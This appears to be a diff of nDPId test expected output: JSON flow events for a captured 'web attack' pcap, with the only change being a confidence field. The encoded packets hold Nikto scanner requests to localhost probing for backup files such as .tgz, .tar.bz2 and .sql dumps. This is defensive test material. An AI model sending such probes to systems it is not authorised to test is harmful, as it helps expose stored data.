00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":1,"flow_last_seen":1576420277291,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277291,"pkt":"AAAAAAAAAAAAAAAACABFAADCVkJAAEAG5fF\/AAABfwAAAcSSH5BxEW7rgO+zGYAYAED+tgAAAQEICp1m\/VOdZv1SR0VUIC8xMjcwMDEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277291,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277291,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277292,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":1,"flow_last_seen":1576420277292,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277292,"pkt":"AAAAAAAAAAAAAAAACABFAADC9VNAAEAGRuB\/AAABfwAAAcSUH5A3Js37LMn8joAYAED+tgAAAQEICp1m\/VSdZv1UR0VUIC8xMjcwMDEudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277292,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277292,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277293,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":1,"flow_last_seen":1576420277293,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277293,"pkt":"AAAAAAAAAAAAAAAACABFAADB0lRAAEAGaeB\/AAABfwAAAcSWH5D4eer6AmSqt4AYAED+tQAAAQEICp1m\/VWdZv1VR0VUIC8xLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277293,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277293,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277295,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":1,"flow_last_seen":1576420277295,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277295,"pkt":"AAAAAAAAAAAAAAAACABFAADBgrRAAEAGuYB\/AAABfwAAAcSYH5BqProaPd\/PWYAYAED+tQAAAQEICp1m\/VedZv1XR0VUIC8xLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277295,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277295,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277296,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":1,"flow_last_seen":1576420277296,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277296,"pkt":"AAAAAAAAAAAAAAAACABFAADFhERAAEAGt+x\/AAABfwAAAcSaH5DLx7zvpnN3coAYAED+uQAAAQEICp1m\/VidZv1YR0VUIC8xMjcwMDEudGFyLmd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277296,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277296,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":1,"flow_last_seen":1576420277298,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277298,"pkt":"AAAAAAAAAAAAAAAACABFAADFkbNAAEAGqn1\/AAABfwAAAcScH5DniakeYsnjE4AYAED+uQAAAQEICp1m\/VqdZv1aR0VUIC8xMjcwMDEudGFyLmd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277299,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":1,"flow_last_seen":1576420277299,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277299,"pkt":"AAAAAAAAAAAAAAAACABFAADATXFAAEAG7sR\/AAABfwAAAcSeH5C5OnXDLQhZdIAYAED+tAAAAQEICp1m\/VudZv1bR0VUIC8xMjcwLnNxbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277299,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277299,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277301,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":1,"flow_last_seen":1576420277301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277301,"pkt":"AAAAAAAAAAAAAAAACABFAADAvp1AAEAGfZh\/AAABfwAAAcSgH5BBBoY3\/wT40oAYAED+tAAAAQEICp1m\/V2dZv1dR0VUIC8xMjcwLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277301,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277301,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 